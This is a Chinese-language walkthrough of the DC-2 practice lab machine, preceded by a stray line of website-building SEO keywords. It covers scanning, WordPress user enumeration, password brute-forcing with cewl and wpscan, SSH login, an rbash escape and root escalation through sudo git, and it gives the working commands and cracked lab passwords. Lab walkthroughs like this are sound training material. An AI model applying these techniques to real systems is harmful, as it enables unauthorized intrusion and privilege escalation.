企业做网站带来的好处,网站建设需要哪些素材,淘宝网做网站,网站设计和网页设计一样吗一、准备工作
靶机下载地址链接: 百度网盘 请输入提取码 提取码: ib86
二、信息收集
1.nmap的信息收集
#xff08;1#xff09;使用nmap 192.168.101.0/24#xff0c;发现靶机地址为192.168.101.115 #xff08;2#xff09;对靶机做进一步探测#xff0c;发现靶机开…一、准备工作
靶机下载地址链接: 百度网盘 请输入提取码 提取码: ib86
二、信息收集
1.nmap的信息收集
1使用nmap 192.168.101.0/24发现靶机地址为192.168.101.115 2对靶机做进一步探测发现靶机开启了80和7744SSH端口: nmap -A -p- 192.168.101.115 3先从80端口寻找突破口访问一下http://192.168.101.115 ,发现URL栏写的不是靶机的ip而是http://dc-2/而很明显DNS没有解析出来 4回过头来注意到nmap扫描时有这样一个提示基本可以确认需要手动配置hosts文件 5配置hosts文件
1.sudo vim /etc/hosts 2.在文件添加192.168.101.115靶机ip dc-2 再次访问http://192.168.101.115,得到一些提示 2.网站的信息收集
cewl是一个kali自带的密码生成工具
6使用cewl生成密码
命令cewl -w dc2_passwords.txt http://dc-2 7确定是wordpress使用wpscan工具进行扫描用户 命令1wpscan --url http://dc-2 --enumerate u #暴力枚举用户名
或命令2wpscan --ignore-main-redirect --url 192.168.:101.115 --enumerate u --force 扫描出三个用户admin、tom和jerry。将三个用户写入dc2_user.txt中。 8利用得到用户密码的字典进行爆破
使用wpscan进行密码爆破命令wpscan --ignore-main-redirect --url 192.168.101.115 -U dc2_user.txt -P dc2_passwords.txt --force Username: jerry, Password: adipiscingUsername: tom , Password: parturient 9尝试ssh远程登录最终tom成功登录
命令tom192.168.101.115 -p 7744 三、渗透
10rbash绕过
1.输入whoami发现事受限的shell命令为rbash 2.绕过shell先输入 BASH_CMDS[a]/bin/sh;a 再输入 /bin/bash 11使用并添加环境变量
PATH就是定义/bin:/sbin:/usr/bin等这些路径的变量其中冒号为目录间的分割符。
可以查看flag3.txt的内容
命令 export PATH$PATH:/bin/ 12切换Jerry用户su jerry flag4 四、提权
13先查看一下自己能不能免密使用一些root级别的命令恰好发现了git 14git提权
1.使用 sudo git help config2.在最底下面输入 !/bin/bash3.最后完成提权。